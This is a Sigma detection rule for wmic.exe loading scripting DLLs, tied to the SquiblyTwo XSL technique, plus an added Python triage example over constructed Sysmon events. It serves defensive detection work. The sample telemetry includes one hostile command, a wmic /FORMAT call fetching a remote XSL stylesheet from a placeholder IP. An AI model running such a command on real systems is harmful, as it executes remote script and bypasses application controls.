WMIC Loading Scripting Libraries
Detects threat actors proxy-executing code and bypassing application controls by leveraging wmic.exe with the /FORMAT argument to download and execute an XSL stylesheet that embeds script (e.g. JScript or VBScript).
This can be an indicator of the SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
Sigma rule
title: WMIC Loading Scripting Libraries
id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32
related:
  - id: 8d63dadf-b91b-4187-87b6-34a1114577ea
    type: similar
  - id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d
    type: similar
status: test
description: |
    Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
    It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
references:
  - https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html
  - https://twitter.com/dez_/status/986614411711442944
  - https://lolbas-project.github.io/lolbas/Binaries/Wmic/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-17
modified: 2022-10-13
tags:
  - attack.defense-evasion
  - attack.t1220
logsource:
  category: image_load
  product: windows
detection:
  selection:
    Image|endswith: '\wmic.exe'
    ImageLoaded|endswith:
      - '\jscript.dll'
      - '\vbscript.dll'
  condition: selection
falsepositives:
  - The command `wmic os get lastbootuptime` loads vbscript.dll
  - The command `wmic os get locale` loads vbscript.dll
  - Since the ImageLoad event doesn't carry enough information on its own, it's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insight
  - The command `wmic ntevent` loads vbscript.dll
level: medium
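The following is an added example, not part of the Sigma rule or of the page it comes from. It evaluates the rule's image_load selection over constructed Sysmon Event ID 7 (image load) records and then applies the triage step the falsepositives section recommends: joining each hit to the Sysmon Event ID 1 (process creation) record of the wmic.exe process by ProcessGuid, so the command line and parent image can be inspected and the three documented benign commands can be separated from activity that needs investigation. All events, GUIDs, paths and the URL are constructed sample data; the known-benign patterns are assumptions derived only from the rule's falsepositives entries.

```python
"""
Added example: evaluate the WMIC Loading Scripting Libraries selection over
constructed Sysmon telemetry and enrich hits with the spawning process.
"""
import re

# The rule's selection as Sigma-style 'endswith' suffix lists. Sigma string
# matching is case-insensitive, so both sides are lower-cased when compared.
IMAGE_SUFFIXES = ("\\wmic.exe",)
LOADED_SUFFIXES = ("\\jscript.dll", "\\vbscript.dll")

# Command lines the rule's falsepositives section documents as loading
# vbscript.dll for benign reasons (assumption: matched on normalised text).
KNOWN_BENIGN = (
    re.compile(r"^wmic(\.exe)?\s+os\s+get\s+lastbootuptime\s*$"),
    re.compile(r"^wmic(\.exe)?\s+os\s+get\s+locale\s*$"),
    re.compile(r"^wmic(\.exe)?\s+ntevent\b"),
)


def _endswith_any(value, suffixes):
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def matches_selection(event):
    """True when an image_load record satisfies the rule's selection."""
    return _endswith_any(event.get("Image", ""), IMAGE_SUFFIXES) and _endswith_any(
        event.get("ImageLoaded", ""), LOADED_SUFFIXES
    )


def normalise_cmdline(cmdline):
    """Lower-case, drop the path/quotes around the wmic binary, collapse spaces."""
    cmd = cmdline.strip().lower()
    cmd = re.sub(r'^"?(?:[a-z]:\\[^"\s]*\\)?(wmic(?:\.exe)?)"?', r"\1", cmd)
    return re.sub(r"\s+", " ", cmd)


def triage(image_loads, process_creations):
    """Run the selection and join each hit to its process creation record
    (Sysmon ProcessGuid) so the analyst sees command line and parent."""
    by_guid = {p["ProcessGuid"]: p for p in process_creations}
    findings = []
    for ev in image_loads:
        if not matches_selection(ev):
            continue
        proc = by_guid.get(ev["ProcessGuid"], {})
        cmd = normalise_cmdline(proc.get("CommandLine", ""))
        benign = any(rx.match(cmd) for rx in KNOWN_BENIGN)
        findings.append({
            "ProcessGuid": ev["ProcessGuid"],
            "ImageLoaded": ev["ImageLoaded"],
            "CommandLine": proc.get("CommandLine", "<no process creation event>"),
            "ParentImage": proc.get("ParentImage", "<unknown>"),
            "disposition": "known-benign command" if benign else "investigate",
        })
    return findings


# Constructed sample telemetry using Sysmon field names (not real data).
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
GUID_BENIGN = "{00000000-0000-0000-0000-000000000001}"
GUID_SUSPECT = "{00000000-0000-0000-0000-000000000002}"
GUID_OTHER = "{00000000-0000-0000-0000-000000000003}"

PROCESS_CREATIONS = [
    {"ProcessGuid": GUID_BENIGN, "Image": WMIC,
     "CommandLine": r'"C:\Windows\System32\wbem\WMIC.exe" os get lastbootuptime',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"ProcessGuid": GUID_SUSPECT, "Image": WMIC,
     "CommandLine": 'wmic os get /FORMAT:"http://203.0.113.5/report.xsl"',
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\invoice.exe"},
    {"ProcessGuid": GUID_OTHER, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

IMAGE_LOADS = [
    {"ProcessGuid": GUID_BENIGN, "Image": WMIC,
     "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},   # hit, benign cmd
    {"ProcessGuid": GUID_SUSPECT, "Image": WMIC,
     "ImageLoaded": r"C:\Windows\System32\jscript.dll"},    # hit, investigate
    {"ProcessGuid": GUID_BENIGN, "Image": WMIC,
     "ImageLoaded": r"C:\Windows\System32\wbem\wbemcomn.dll"},  # not a script DLL
    {"ProcessGuid": GUID_OTHER, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},   # not wmic.exe
]

if __name__ == "__main__":
    for f in triage(IMAGE_LOADS, PROCESS_CREATIONS):
        print(f["disposition"], "|", f["ImageLoaded"], "|", f["CommandLine"],
              "| parent:", f["ParentImage"])
```

Running the block yields two findings: the `os get lastbootuptime` load of vbscript.dll is tagged as a known-benign command, while the `/FORMAT` command line spawned from a temp-folder executable is left as "investigate". The join on ProcessGuid is what makes the triage possible, since the image_load record alone carries neither the command line nor the parent image.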
Related rules
- Potential Remote SquiblyTwo Technique Execution
- XSL Script Execution Via WMIC.EXE
- Remote XSL Execution Via Msxsl.EXE
- Msxsl.EXE Execution
- Creation Of Non-Existent System DLL